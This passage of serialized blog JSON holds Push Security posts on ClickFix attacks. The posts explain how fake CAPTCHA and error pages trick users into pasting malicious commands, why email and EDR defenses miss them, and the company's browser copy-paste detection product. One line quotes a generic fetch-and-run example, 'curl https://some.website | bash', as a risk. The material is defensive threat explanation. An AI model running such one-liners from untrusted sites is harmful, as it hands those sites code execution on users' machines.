",[],{},{"nodeType":1351,"data":2479,"content":2483},{"target":2480},{"sys":2481},{"id":2482,"type":1356,"linkType":1357},"2rUDKawJnrmZVtxfNcSNha",[],{"nodeType":1433,"data":2485,"content":2486},{},[],{"nodeType":1437,"data":2488,"content":2489},{},[2490],{"nodeType":1293,"value":2491,"marks":2492,"data":2494},"What’s the impact of ClickFix evolution?",[2493],{"type":1444},{},{"nodeType":1294,"data":2496,"content":2497},{},[2498],{"nodeType":1293,"value":2499,"marks":2500,"data":2501},"To summarize:",[],{},{"nodeType":1536,"data":2503,"content":2504},{},[2505,2515,2525],{"nodeType":1540,"data":2506,"content":2507},{},[2508],{"nodeType":1294,"data":2509,"content":2510},{},[2511],{"nodeType":1293,"value":2512,"marks":2513,"data":2514},"ClickFix pages are becoming increasingly sophisticated, making it more likely that victims will fall for the social engineering.",[],{},{"nodeType":1540,"data":2516,"content":2517},{},[2518],{"nodeType":1294,"data":2519,"content":2520},{},[2521],{"nodeType":1293,"value":2522,"marks":2523,"data":2524},"ClickFix delivery is evading traditional monitoring controls at the email layer to reach victims. ",[],{},{"nodeType":1540,"data":2526,"content":2527},{},[2528],{"nodeType":1294,"data":2529,"content":2530},{},[2531],{"nodeType":1293,"value":2532,"marks":2533,"data":2534},"ClickFix payloads are becoming more varied and are finding new ways to evade security controls. ",[],{},{"nodeType":1294,"data":2536,"content":2537},{},[2538],{"nodeType":1293,"value":2539,"marks":2540,"data":2541},"This means that EDR-based interception of malware execution is the last — and only — real line of defense for most organizations, kicking in after the initial script has been run (typically acting as a stager for the real malware). ",[],{},{"nodeType":1294,"data":2543,"content":2544},{},[2545],{"nodeType":1293,"value":2546,"marks":2547,"data":2548},"Malware execution can and should be intercepted by EDR, but it’s not foolproof. ",[],{},{"nodeType":1536,"data":2550,"content":2551},{},[2552,2575,2585],{"nodeType":1540,"data":2553,"content":2554},{},[2555],{"nodeType":1294,"data":2556,"content":2557},{},[2558,2562,2571],{"nodeType":1293,"value":2559,"marks":2560,"data":2561},"Attackers are constantly ",[],{},{"nodeType":1329,"data":2563,"content":2565},{"uri":2564},"https://www.infostealers.com/article/logins-zip-leverages-chromium-zero-day-stealthy-infostealer-builder-promises-99-credential-theft-in-under-12-seconds/",[2566],{"nodeType":1293,"value":2567,"marks":2568,"data":2570},"developing new tools and capabilities",[2569],{"type":1337},{},{"nodeType":1293,"value":2572,"marks":2573,"data":2574}," to bypass EDR in the cat-and-mouse game between attackers and defenders.",[],{},{"nodeType":1540,"data":2576,"content":2577},{},[2578],{"nodeType":1294,"data":2579,"content":2580},{},[2581],{"nodeType":1293,"value":2582,"marks":2583,"data":2584},"Because ClickFix attacks are user initiated, context might be missing that lead to the alert being misclassified. This can mean the difference between the level of priority alert that is raised, and whether or not it is automatically blocked.",[],{},{"nodeType":1540,"data":2586,"content":2587},{},[2588],{"nodeType":1294,"data":2589,"content":2590},{},[2591],{"nodeType":1293,"value":2592,"marks":2593,"data":2594},"If you’re an organization that allows employees and contractors to use unmanaged BYOD devices, there’s a strong chance that there are gaps in your EDR coverage.",[],{},{"nodeType":1294,"data":2596,"content":2597},{},[2598,2602,2610],{"nodeType":1293,"value":2599,"marks":2600,"data":2601},"This is why attackers are doubling down. According to the ",[],{},{"nodeType":1329,"data":2603,"content":2605},{"uri":2604},"https://cdn-dynmedia-1.microsoft.com/is/content/microsoftcorp/microsoft/msc/documents/presentations/CSR/Microsoft-Digital-Defense-Report-2025.pdf#page=1",[2606],{"nodeType":1293,"value":2607,"marks":2608,"data":2609},"2025 Microsoft Digital Defense report",[],{},{"nodeType":1293,"value":2611,"marks":2612,"data":2613},", ClickFix was the most common initial access method in the last year, accounting for 47% of attacks. That's a pretty significant stat.",[],{},{"nodeType":2615,"data":2616,"content":2617},"blockquote",{},[2618],{"nodeType":1294,"data":2619,"content":2620},{},[2621],{"nodeType":1293,"value":2622,"marks":2623,"data":2624},"47% of attacks started with ClickFix in the last year, according to Microsoft.",[],{},{"nodeType":1294,"data":2626,"content":2627},{},[2628],{"nodeType":1293,"value":2629,"marks":2630,"data":2631},"Ultimately, organizations are leaving themselves relying on a single line of defense — if the attack isn’t detected and blocked by EDR, it isn’t spotted at all. ",[],{},{"nodeType":1433,"data":2633,"content":2634},{},[],{"nodeType":1437,"data":2636,"content":2637},{},[2638],{"nodeType":1293,"value":2639,"marks":2640,"data":2642},"Don’t gamble on a single point of failure ",[2641],{"type":1444},{},{"nodeType":1294,"data":2644,"content":2645},{},[2646,2650,2659],{"nodeType":1293,"value":2647,"marks":2648,"data":2649},"Push Security’s latest feature, ",[],{},{"nodeType":1329,"data":2651,"content":2653},{"uri":2652},"https://pushsecurity.com/blog/introducing-malicious-copy-paste-detection?utm_source=thehackernews&utm_medium=sponsored-content&utm_term=article",[2654],{"nodeType":1293,"value":2655,"marks":2656,"data":2658},"malicious copy and paste detection",[2657],{"type":1337},{},{"nodeType":1293,"value":2660,"marks":2661,"data":2662},", tackles ClickFix-style attacks at the earliest opportunity through browser-based detection and blocking. This is a universally effective control that works regardless of the lure delivery channel, page style and structure, or the specifics of the malware type and execution.",[],{},{"nodeType":1294,"data":2664,"content":2665},{},[2666],{"nodeType":1293,"value":2667,"marks":2668,"data":2669},"Unlike heavy-handed DLP solutions that block copy-paste altogether, Push protects your employees without disrupting their user experience or hampering productivity.",[],{},{"nodeType":1294,"data":2671,"content":2672},{},[2673],{"nodeType":1293,"value":2674,"marks":2675,"data":2676},"By adding a new layer of protection in the browser, security teams can reduce the strain on their EDR and reduce the risk of host-based controls being bypassed through misconfiguration or attacker innovation. ",[],{},{"nodeType":1351,"data":2678,"content":2682},{"target":2679},{"sys":2680},{"id":2681,"type":1356,"linkType":1357},"sALkMt8UbTZ2f34hKvGLj",[],{"nodeType":1433,"data":2684,"content":2685},{},[],{"nodeType":1437,"data":2687,"content":2688},{},[2689],{"nodeType":1293,"value":2690,"marks":2691,"data":2693},"Learn more",[2692],{"type":1444},{},{"nodeType":1294,"data":2695,"content":2696},{},[2697,2701,2710],{"nodeType":1293,"value":2698,"marks":2699,"data":2700},"If you want to learn more about ClickFix attacks and how they’re evolving, ",[],{},{"nodeType":1329,"data":2702,"content":2704},{"uri":2703},"https://pushsecurity.com/resources/clickfix",[2705],{"nodeType":1293,"value":2706,"marks":2707,"data":2709},"check out our latest webinar (now available on-demand!)",[2708],{"type":1337},{},{"nodeType":1293,"value":2711,"marks":2712,"data":2713}," where we dive into real-world ClickFix examples and demonstrate how ClickFix sites work under the hood. ",[],{},{"nodeType":1294,"data":2715,"content":2716},{},[2717,2720,2727,2730,2737],{"nodeType":1293,"value":2111,"marks":2718,"data":2719},[],{},{"nodeType":1329,"data":2721,"content":2722},{"uri":2116},[2723],{"nodeType":1293,"value":2119,"marks":2724,"data":2726},[2725],{"type":1337},{},{"nodeType":1293,"value":2124,"marks":2728,"data":2729},[],{},{"nodeType":1329,"data":2731,"content":2732},{"uri":2129},[2733],{"nodeType":1293,"value":2132,"marks":2734,"data":2736},[2735],{"type":1337},{},{"nodeType":1293,"value":1516,"marks":2738,"data":2739},[],{},{"nodeType":1351,"data":2741,"content":2744},{"target":2742},{"sys":2743},{"id":2296,"type":1356,"linkType":1357},[],{"nodeType":1294,"data":2746,"content":2747},{},[2748],{"nodeType":1293,"value":37,"marks":2749,"data":2750},[],{},"The most advanced ClickFix yet?","Breaking down the most sophisticated ClickFix page we’ve seen in the wild — and what it tells us about the future of malicious copy-and-paste attacks. ","2025-11-06T00:00:00.000Z","the-most-advanced-clickfix-yet",{"items":2756},[2757,2759],{"sys":2758,"name":1310},{"id":1309},{"sys":2760,"name":1306},{"id":1305},{"items":2762},[2763],{"fullName":2164,"firstName":2165,"jobTitle":2166,"profilePicture":2764},{"url":2168},{"__typename":1314,"sys":2766,"content":2768,"title":3390,"synopsis":3391,"hashTags":118,"publishedDate":3392,"slug":3393,"tagsCollection":3394,"authorsCollection":3400},{"id":2767},"1u8RJxC00HbBhCBVxcDnkK",{"json":2769},{"nodeType":1295,"data":2770,"content":2771},{},[2772,2818,2875,2890,2895,2902,2905,2913,2920,2927,2934,2954,2961,2967,2985,2991,2994,3002,3009,3017,3037,3044,3051,3058,3066,3073,3080,3086,3093,3126,3132,3140,3159,3166,3189,3196,3203,3209,3216,3219,3227,3241,3261,3268,3275,3282,3287,3295,3314,3317,3325,3332,3339,3346,3353,3379,3384],{"nodeType":1294,"data":2773,"content":2774},{},[2775,2779,2788,2792,2801,2805,2814],{"nodeType":1293,"value":2776,"marks":2777,"data":2778},"One of the biggest security trends in the past year has been the emergence of the attack technique known as ",[],{},{"nodeType":1329,"data":2780,"content":2782},{"uri":2781},"https://www.microsoft.com/en-us/security/blog/2025/08/21/think-before-you-clickfix-analyzing-the-clickfix-social-engineering-technique/",[2783],{"nodeType":1293,"value":2784,"marks":2785,"data":2787},"ClickFix",[2786],{"type":1337},{},{"nodeType":1293,"value":2789,"marks":2790,"data":2791},". Various reports indicate that ClickFix is fast becoming one of the most prevalent attack techniques this year, with ",[],{},{"nodeType":1329,"data":2793,"content":2795},{"uri":2794},"https://www.scworld.com/news/clickfix-phishing-links-increased-nearly-400-in-12-months-report-says",[2796],{"nodeType":1293,"value":2797,"marks":2798,"data":2800},"one study",[2799],{"type":1337},{},{"nodeType":1293,"value":2802,"marks":2803,"data":2804}," reporting that email-based ClickFix attacks have increased by 400% YOY, and ",[],{},{"nodeType":1329,"data":2806,"content":2808},{"uri":2807},"https://web-assets.esetstatic.com/wls/en/papers/threat-reports/eset-threat-report-h12025.pdf",[2809],{"nodeType":1293,"value":2810,"marks":2811,"data":2813},"another",[2812],{"type":1337},{},{"nodeType":1293,"value":2815,"marks":2816,"data":2817}," highlighting a 517% increase in the past 6 months. ",[],{},{"nodeType":1294,"data":2819,"content":2820},{},[2821,2825,2834,2837,2846,2849,2858,2862,2871],{"nodeType":1293,"value":2822,"marks":2823,"data":2824},"ClickFix is known to be regularly used by the Interlock ransomware group and other prolific threat actors. A number of recent public data breaches have been linked to ClickFix attacks as the attack vector, such as ",[],{},{"nodeType":1329,"data":2826,"content":2828},{"uri":2827},"https://www.bleepingcomputer.com/news/security/kettering-health-confirms-interlock-ransomware-behind-cyberattack/",[2829],{"nodeType":1293,"value":2830,"marks":2831,"data":2833},"Kettering Health",[2832],{"type":1337},{},{"nodeType":1293,"value":1389,"marks":2835,"data":2836},[],{},{"nodeType":1329,"data":2838,"content":2840},{"uri":2839},"https://www.bleepingcomputer.com/news/security/interlock-ransomware-claims-davita-attack-leaks-stolen-data/",[2841],{"nodeType":1293,"value":2842,"marks":2843,"data":2845},"DaVita",[2844],{"type":1337},{},{"nodeType":1293,"value":1389,"marks":2847,"data":2848},[],{},{"nodeType":1329,"data":2850,"content":2852},{"uri":2851},"https://www.infosecurity-magazine.com/news/st-paul-mayor-interlock-data-leak/",[2853],{"nodeType":1293,"value":2854,"marks":2855,"data":2857},"City of St. Paul, Minnesota",[2856],{"type":1337},{},{"nodeType":1293,"value":2859,"marks":2860,"data":2861},", and the ",[],{},{"nodeType":1329,"data":2863,"content":2865},{"uri":2864},"https://www.blackfog.com/texas-tech-cyberattack-1-4m-records-compromised/",[2866],{"nodeType":1293,"value":2867,"marks":2868,"data":2870},"Texas Tech University Health Sciences Centers",[2869],{"type":1337},{},{"nodeType":1293,"value":2872,"marks":2873,"data":2874}," (with many more breaches likely to involve ClickFix where the attack vector wasn’t known or disclosed).",[],{},{"nodeType":1294,"data":2876,"content":2877},{},[2878,2882,2886],{"nodeType":1293,"value":2879,"marks":2880,"data":2881},"Push’s latest feature, ",[],{},{"nodeType":1293,"value":2655,"marks":2883,"data":2885},[2884],{"type":1444},{},{"nodeType":1293,"value":2887,"marks":2888,"data":2889},", tackles ClickFix-style attacks at the earliest opportunity through browser-based detection, with a universally effective control that works regardless of the lure delivery channel, or page style and structure. ",[],{},{"nodeType":1351,"data":2891,"content":2894},{"target":2892},{"sys":2893},{"id":2681,"type":1356,"linkType":1357},[],{"nodeType":1294,"data":2896,"content":2897},{},[2898],{"nodeType":1293,"value":2899,"marks":2900,"data":2901},"Before we get into the specifics of the feature, let’s take a look at what ClickFix is and why it poses a detection and response challenge to security teams.",[],{},{"nodeType":1433,"data":2903,"content":2904},{},[],{"nodeType":1437,"data":2906,"content":2907},{},[2908],{"nodeType":1293,"value":2909,"marks":2910,"data":2912},"ClickFix 101",[2911],{"type":1444},{},{"nodeType":1294,"data":2914,"content":2915},{},[2916],{"nodeType":1293,"value":2917,"marks":2918,"data":2919},"ClickFix attacks prompt the user to solve some kind of problem or challenge in the browser — most commonly a CAPTCHA, but also things like fixing an error on a webpage. The name is a little misleading though — the key factor in the attack is that they trick users into running malicious commands on their device by copying malicious code from the page clipboard and running it locally. (For simplicity we’ll keep calling it ClickFix, but we’re not happy about it.)",[],{},{"nodeType":1294,"data":2921,"content":2922},{},[2923],{"nodeType":1293,"value":2924,"marks":2925,"data":2926},"The copy action is either performed manually by the user, or automatically by the page. Manual copies typically include additional social engineering to lure the victim into hitting CTRL+C, while automatic copies are performed using JavaScript running on the page. Most ClickFix pages we've seen are automatic copies, which makes sense — fewer steps means the user is more likely to follow the instruction.",[],{},{"nodeType":1294,"data":2928,"content":2929},{},[2930],{"nodeType":1293,"value":2931,"marks":2932,"data":2933},"Most commonly, these attacks are used to deliver remote access software or infostealer malware using stolen session cookies and credentials to facilitate attacks on business apps and services. From there, the attacker simply dumps the data and holds the victim to ransom for its deletion — often dropping ransomware afterwards for double the extortion. ",[],{},{"nodeType":1294,"data":2935,"content":2936},{},[2937,2941,2950],{"nodeType":1293,"value":2938,"marks":2939,"data":2940},"The attack gives the victim instructions that involve clicking prompts and copying, pasting, and running commands directly in the Windows Run dialog box, Terminal, or PowerShell in order to “fix” the fake problem that they’re experiencing. Variants such as ",[],{},{"nodeType":1329,"data":2942,"content":2944},{"uri":2943},"https://mrd0x.com/filefix-clickfix-alternative/",[2945],{"nodeType":1293,"value":2946,"marks":2947,"data":2949},"FileFix",[2948],{"type":1337},{},{"nodeType":1293,"value":2951,"marks":2952,"data":2953}," have also emerged which instead use the File Explorer Address Bar to execute OS commands.",[],{},{"nodeType":1294,"data":2955,"content":2956},{},[2957],{"nodeType":1293,"value":2958,"marks":2959,"data":2960},"Links to malicious ClickFix pages are distributed over various delivery channels, with attacks shifting from traditional email-based delivery to social media, instant messaging apps, malicious ads in places like Google Search, and using in-app notifications and messages across numerous SaaS services. ",[],{},{"nodeType":1351,"data":2962,"content":2966},{"target":2963},{"sys":2964},{"id":2965,"type":1356,"linkType":1357},"1I9ERDY2tuspw5zVMV5DbY",[],{"nodeType":1294,"data":2968,"content":2969},{},[2970,2974,2981],{"nodeType":1293,"value":2971,"marks":2972,"data":2973},"ClickFix comes in a variety of lures, including impersonating CAPTCHA, Cloudflare Turnstile, simulating an error loading a webpage, and many more. They have also been observed targeting a ",[],{},{"nodeType":1329,"data":2975,"content":2976},{"uri":2433},[2977],{"nodeType":1293,"value":2978,"marks":2979,"data":2980},"wide range of services",[],{},{"nodeType":1293,"value":2982,"marks":2983,"data":2984}," to execute code. ",[],{},{"nodeType":1351,"data":2986,"content":2990},{"target":2987},{"sys":2988},{"id":2989,"type":1356,"linkType":1357},"1SG52ta1hcBZ3gYDsSJvsm",[],{"nodeType":1433,"data":2992,"content":2993},{},[],{"nodeType":1437,"data":2995,"content":2996},{},[2997],{"nodeType":1293,"value":2998,"marks":2999,"data":3001},"Why are ClickFix attacks so effective?",[3000],{"type":1444},{},{"nodeType":1294,"data":3003,"content":3004},{},[3005],{"nodeType":1293,"value":3006,"marks":3007,"data":3008},"To understand the effectiveness of ClickFix-style attacks, we need to look more closely at the mechanisms that security teams have at their disposal to counter these attacks. ",[],{},{"nodeType":1520,"data":3010,"content":3011},{},[3012],{"nodeType":1293,"value":3013,"marks":3014,"data":3016},"Detection challenges during delivery",[3015],{"type":1444},{},{"nodeType":1294,"data":3018,"content":3019},{},[3020,3024,3033],{"nodeType":1293,"value":3021,"marks":3022,"data":3023},"We’ve written extensively about ",[],{},{"nodeType":1329,"data":3025,"content":3027},{"uri":3026},"https://pushsecurity.com/blog/phishing-detection-evasion-launch/",[3028],{"nodeType":1293,"value":3029,"marks":3030,"data":3032},"the evolution in phishing techniques and tooling",[3031],{"type":1337},{},{"nodeType":1293,"value":3034,"marks":3035,"data":3036},", and what this means for the reliability of traditional detections at the network and endpoint layer. ",[],{},{"nodeType":1294,"data":3038,"content":3039},{},[3040],{"nodeType":1293,"value":3041,"marks":3042,"data":3043},"The latest generation of phishing pages are dynamically obfuscating the code that loads the web page, implementing custom bot protection (e.g. CAPTCHA or Cloudflare Turnstile), using runtime anti-analysis features, and using legitimate SaaS and cloud services to host and deliver phishing links to cover their tracks.",[],{},{"nodeType":1294,"data":3045,"content":3046},{},[3047],{"nodeType":1293,"value":3048,"marks":3049,"data":3050},"This means that traditional anti-phishing tools at the email and network layer are struggling to keep up, with many attacks evading email-based detections (or bypassing email altogether). At the same time, proxy-based solutions now see a garbled mess of JavaScript code without the necessary context of what is actually happening in the browser to be able to piece it together effectively. Even if they don’t realize it, this means many organizations are now relying solely on blocking known-bad sites and hosts — a wildly ineffective solution in 2025 with the rate that attackers refresh and rotate their phishing infrastructure. ",[],{},{"nodeType":1294,"data":3052,"content":3053},{},[3054],{"nodeType":1293,"value":3055,"marks":3056,"data":3057},"In addition to the fact that ClickFix page styles and content can vary significantly, this means that detecting ClickFix delivery using traditional tooling is highly unreliable. ",[],{},{"nodeType":1520,"data":3059,"content":3060},{},[3061],{"nodeType":1293,"value":3062,"marks":3063,"data":3065},"Detection challenges during execution",[3064],{"type":1444},{},{"nodeType":1294,"data":3067,"content":3068},{},[3069],{"nodeType":1293,"value":3070,"marks":3071,"data":3072},"Most of the detection heavy lifting is being done at the endpoint, looking for user-level code execution and malware running on a device. ",[],{},{"nodeType":1294,"data":3074,"content":3075},{},[3076],{"nodeType":1293,"value":3077,"marks":3078,"data":3079},"However, the number of ClickFix-related headlines in the news would indicate that endpoint controls are being routinely bypassed, or perhaps evaded altogether by targeting personal or BYOD devices. ",[],{},{"nodeType":1351,"data":3081,"content":3085},{"target":3082},{"sys":3083},{"id":3084,"type":1356,"linkType":1357},"pocty4OhER5EXr8BDwdzo",[],{"nodeType":1294,"data":3087,"content":3088},{},[3089],{"nodeType":1293,"value":3090,"marks":3091,"data":3092},"There are a number of reasons that endpoint-level ClickFix detections can be bypassed:",[],{},{"nodeType":1536,"data":3094,"content":3095},{},[3096,3106,3116],{"nodeType":1540,"data":3097,"content":3098},{},[3099],{"nodeType":1294,"data":3100,"content":3101},{},[3102],{"nodeType":1293,"value":3103,"marks":3104,"data":3105},"The step of downloading a file from the web is bypassed altogether. In a ClickFix/FileFix attack, the initial “dropper” is essentially a command string provided by the attacker and executed by legitimate system utilities. There is often no new executable file written to disk when the user runs the command. The final payload may be loaded directly into memory or injected into trusted programs (using living-off-the-land techniques). Without a file to quarantine, there's no \"Mark of the Web\" to make it appear suspicious. ",[],{},{"nodeType":1540,"data":3107,"content":3108},{},[3109],{"nodeType":1294,"data":3110,"content":3111},{},[3112],{"nodeType":1293,"value":3113,"marks":3114,"data":3115},"From the EDR’s point of view, a trusted parent process is launching a script – which might not immediately be judged as malicious, especially if the command is obfuscated or uses allowed system functions. Since the action is initiated by the user, it blends in with normal user-driven administration tasks. ",[],{},{"nodeType":1540,"data":3117,"content":3118},{},[3119],{"nodeType":1294,"data":3120,"content":3121},{},[3122],{"nodeType":1293,"value":3123,"marks":3124,"data":3125},"The PowerShell commands themselves might be obfuscated or broken into stages to avoid easy detection by heuristic rules. EDR telemetry might record that a PowerShell process ran, but without a known bad signature or a clear policy violation, it may not flag it immediately. ",[],{},{"nodeType":1351,"data":3127,"content":3131},{"target":3128},{"sys":3129},{"id":3130,"type":1356,"linkType":1357},"6djGsqBFTHlLLITpTK7IMk",[],{"nodeType":1520,"data":3133,"content":3134},{},[3135],{"nodeType":1293,"value":3136,"marks":3137,"data":3139},"Accessing ClickFix-style capabilities is easier than ever",[3138],{"type":1444},{},{"nodeType":1294,"data":3141,"content":3142},{},[3143,3147,3155],{"nodeType":1293,"value":3144,"marks":3145,"data":3146},"This capability is increasingly available to all levels of threat actor, with ",[],{},{"nodeType":1329,"data":3148,"content":3149},{"uri":2781},[3150],{"nodeType":1293,"value":3151,"marks":3152,"data":3154},"off-the-shelf options available",[3153],{"type":1337},{},{"nodeType":1293,"value":3156,"marks":3157,"data":3158}," in the form of ClickFix builders (also called “Win + R”) on popular hacker forums since late 2024. ",[],{},{"nodeType":1294,"data":3160,"content":3161},{},[3162],{"nodeType":1293,"value":3163,"marks":3164,"data":3165},"Attackers are bundling ClickFix builders into their existing kits to:",[],{},{"nodeType":1536,"data":3167,"content":3168},{},[3169,3179],{"nodeType":1540,"data":3170,"content":3171},{},[3172],{"nodeType":1294,"data":3173,"content":3174},{},[3175],{"nodeType":1293,"value":3176,"marks":3177,"data":3178},"Use pre-canned landing pages with various lures including Cloudflare. ",[],{},{"nodeType":1540,"data":3180,"content":3181},{},[3182],{"nodeType":1294,"data":3183,"content":3184},{},[3185],{"nodeType":1293,"value":3186,"marks":3187,"data":3188},"Offer construction of malicious commands that users will paste into the Windows Run dialog. ",[],{},{"nodeType":1294,"data":3190,"content":3191},{},[3192],{"nodeType":1293,"value":3193,"marks":3194,"data":3195},"These kits claim to guarantee antivirus and web protection bypass (some even promise that they can bypass Microsoft Defender SmartScreen), as well as payload persistence. The cost of subscription to such a service might be between US$200 to US$1,500 per month. ",[],{},{"nodeType":1294,"data":3197,"content":3198},{},[3199],{"nodeType":1293,"value":3200,"marks":3201,"data":3202},"In short, these capabilities are increasingly accessible to the general population of hackers, and it is increasingly in the interests of malware developers to offer premium hacker tools designed to bypass current detections. ",[],{},{"nodeType":1351,"data":3204,"content":3208},{"target":3205},{"sys":3206},{"id":3207,"type":1356,"linkType":1357},"5hkRsOBZCOABAShCo8RjJg",[],{"nodeType":1294,"data":3210,"content":3211},{},[3212],{"nodeType":1293,"value":3213,"marks":3214,"data":3215},"In any case, relying on just-in-time detection at the point of execution is increasingly unreliable and will always be at the mercy of the cat-and-mouse game between attackers and defenders. Organizations employing custom detections looking for specific malware behavior are likely to have better success than those relying on out-of-the-box EDR configs, but this requires continual maintenance to be effective. ",[],{},{"nodeType":1433,"data":3217,"content":3218},{},[],{"nodeType":1437,"data":3220,"content":3221},{},[3222],{"nodeType":1293,"value":3223,"marks":3224,"data":3226},"Solving ClickFix detection in the browser with Push",[3225],{"type":1444},{},{"nodeType":1294,"data":3228,"content":3229},{},[3230,3233,3237],{"nodeType":1293,"value":2879,"marks":3231,"data":3232},[],{},{"nodeType":1293,"value":2655,"marks":3234,"data":3236},[3235],{"type":1444},{},{"nodeType":1293,"value":3238,"marks":3239,"data":3240},", tackles ClickFix-style attacks at the earliest opportunity through browser-based detection and blocking, with a universally effective control that works regardless of the lure delivery channel, page style and structure, or the specifics of the malware type and execution.",[],{},{"nodeType":1294,"data":3242,"content":3243},{},[3244,3248,3257],{"nodeType":1293,"value":3245,"marks":3246,"data":3247},"A key part of our design philosophy is to find ways to universally detect attacker TTPs by analyzing generic attacker actions that can’t be avoided by the attacker. One of our best prior examples of this is with our ",[],{},{"nodeType":1329,"data":3249,"content":3251},{"uri":3250},"https://pushsecurity.com/blog/introducing-sso-password-protection/",[3252],{"nodeType":1293,"value":3253,"marks":3254,"data":3256},"password protection feature",[3255],{"type":1337},{},{"nodeType":1293,"value":3258,"marks":3259,"data":3260},", which detects and blocks phishing attacks by triggering when a user attempts to enter a password that belongs to one domain on a different domain. ",[],{},{"nodeType":1294,"data":3262,"content":3263},{},[3264],{"nodeType":1293,"value":3265,"marks":3266,"data":3267},"In the case of ClickFix, every attack involves copying a malicious script from a page — a behavior the attacker can’t avoid.",[],{},{"nodeType":1294,"data":3269,"content":3270},{},[3271],{"nodeType":1293,"value":3272,"marks":3273,"data":3274},"Unlike heavy-handed DLP solutions that block copy-paste altogether, Push protects your employees without disrupting their user experience or hampering productivity. ",[],{},{"nodeType":1294,"data":3276,"content":3277},{},[3278],{"nodeType":1293,"value":3279,"marks":3280,"data":3281},"Check out the video below to see Push in action. ",[],{},{"nodeType":1351,"data":3283,"content":3286},{"target":3284},{"sys":3285},{"id":2681,"type":1356,"linkType":1357},[],{"nodeType":1520,"data":3288,"content":3289},{},[3290],{"nodeType":1293,"value":3291,"marks":3292,"data":3294},"Enable ClickFix detection in just a few clicks",[3293],{"type":1444},{},{"nodeType":1294,"data":3296,"content":3297},{},[3298,3302,3310],{"nodeType":1293,"value":3299,"marks":3300,"data":3301},"Check out the ",[],{},{"nodeType":1329,"data":3303,"content":3305},{"uri":3304},"https://pushsecurity.com/help/10141/#start",[3306],{"nodeType":1293,"value":3307,"marks":3308,"data":3309},"help article",[],{},{"nodeType":1293,"value":3311,"marks":3312,"data":3313}," for step-by-step instructions on how to enable the control. ",[],{},{"nodeType":1433,"data":3315,"content":3316},{},[],{"nodeType":1437,"data":3318,"content":3319},{},[3320],{"nodeType":1293,"value":3321,"marks":3322,"data":3324},"Learn more about Push",[3323],{"type":1444},{},{"nodeType":1294,"data":3326,"content":3327},{},[3328],{"nodeType":1293,"value":3329,"marks":3330,"data":3331},"Push provides last mile protection against browser-based attacks, adding a net-new layer of technical protection in the browser. ",[],{},{"nodeType":1294,"data":3333,"content":3334},{},[3335],{"nodeType":1293,"value":3336,"marks":3337,"data":3338},"Right now, most organizations are left relying on user awareness. Faced with increasingly novel attack types, encountered all over the internet, users are being caught unawares — further reducing the efficacy of an already fragile control. ",[],{},{"nodeType":1294,"data":3340,"content":3341},{},[3342],{"nodeType":1293,"value":3343,"marks":3344,"data":3345},"By seeing what the user sees in the browser, as they see it, as well as monitoring for risky behaviors, Push provides a strong backstop against an ever-expanding landscape of browser-based exploits. ",[],{},{"nodeType":1294,"data":3347,"content":3348},{},[3349],{"nodeType":1293,"value":3350,"marks":3351,"data":3352},"Push’s browser-based security platform provides comprehensive identity attack detection and response capabilities against techniques like AiTM phishing, credential stuffing, ClickFixing, malicious browser extensions, and session hijacking using stolen session tokens. You can also use Push to find and fix vulnerabilities across the apps that your employees use, like ghost logins, SSO coverage gaps, MFA gaps, vulnerable passwords, risky OAuth integrations, and more to harden your identity attack surface.",[],{},{"nodeType":1294,"data":3354,"content":3355},{},[3356,3359,3366,3369,3376],{"nodeType":1293,"value":2111,"marks":3357,"data":3358},[],{},{"nodeType":1329,"data":3360,"content":3361},{"uri":2116},[3362],{"nodeType":1293,"value":2119,"marks":3363,"data":3365},[3364],{"type":1337},{},{"nodeType":1293,"value":2124,"marks":3367,"data":3368},[],{},{"nodeType":1329,"data":3370,"content":3371},{"uri":2129},[3372],{"nodeType":1293,"value":2132,"marks":3373,"data":3375},[3374],{"type":1337},{},{"nodeType":1293,"value":1516,"marks":3377,"data":3378},[],{},{"nodeType":1351,"data":3380,"content":3383},{"target":3381},{"sys":3382},{"id":3130,"type":1356,"linkType":1357},[],{"nodeType":1294,"data":3385,"content":3386},{},[3387],{"nodeType":1293,"value":37,"marks":3388,"data":3389},[],{},"Introducing malicious copy and paste detection","Push now detects malware delivery in the browser, supporting a layered defense against endpoint attacks. ","2025-10-09T00:00:00.000Z","introducing-malicious-copy-paste-detection",{"items":3395},[3396,3398],{"sys":3397,"name":1310},{"id":1309},{"sys":3399,"name":1306},{"id":1305},{"items":3401},[3402],{"fullName":2164,"firstName":2165,"jobTitle":2166,"profilePicture":3403},{"url":2168},{"items":3405},[3406],{"fullName":3407,"firstName":3408,"jobTitle":3409,"profilePicture":3410},"Jacques Louw","Jacques","Co-founder / CRO",{"url":3411},"https://images.ctfassets.net/y1cdw1ablpvd/39m8bektV23lnCRcEq0G8h/2a08f6276a50744f1a4b499b273f6bb2/Push_Founders_at_Cahoots_October_28_2022_by_Doug_Coombe-21.jpg",{"json":3413,"links":4421},{"nodeType":1295,"data":3414,"content":3415},{},[3416,3422,3429,3436,3444,3460,3466,3469,3477,3484,3491,3498,3505,3512,3519,3526,3533,3539,3545,3552,3558,3565,3572,3578,3584,3590,3596,3616,3628,3635,3641,3648,3655,3688,3695,3703,3710,3716,3723,3729,3736,3755,3762,3765,3773,3780,3875,3882,3888,3891,3899,3906,3913,3920,3960,3963,3971,3991,3998,4006,4216,4224,4257,4265,4274,4280,4288,4295,4303,4314,4322,4328,4336,4347,4355,4363,4371,4379,4387,4395,4406,4413],{"nodeType":1351,"data":3417,"content":3421},{"target":3418},{"sys":3419},{"id":3420,"type":1356,"linkType":1357},"38JCcRQe2tN9ooHGwreoF5",[],{"nodeType":1294,"data":3423,"content":3424},{},[3425],{"nodeType":1293,"value":3426,"marks":3427,"data":3428},"There was a time, not that long ago, when pasting a command from a website straight into your terminal was something you’d only try once before some grizzled senior engineer beat it out of you. That’s because you’re effectively handing a website a blank cheque to execute whatever it wants on your system.",[],{},{"nodeType":1294,"data":3430,"content":3431},{},[3432],{"nodeType":1293,"value":3433,"marks":3434,"data":3435},"But somehow, it’s now the default. Homebrew, Rust, nvm, Bun, oh-my-zsh and hundreds of the most widely used developer tools on the planet now ship with the same instructions. Copy a “curl to bash” ( curl https://some.website | bash) one-liner from a website, paste it into your terminal, and hit enter. The entire security model boils down to \"trust the domain.\" And with AI adoption encouraging more non-technical users to work with the kind of tools that only devs used to use, this suddenly becomes a threat to a much larger, less security conscious pool of users.",[],{},{"nodeType":1294,"data":3437,"content":3438},{},[3439],{"nodeType":1293,"value":3440,"marks":3441,"data":3443},"It’s not hard to see how attackers can exploit this. 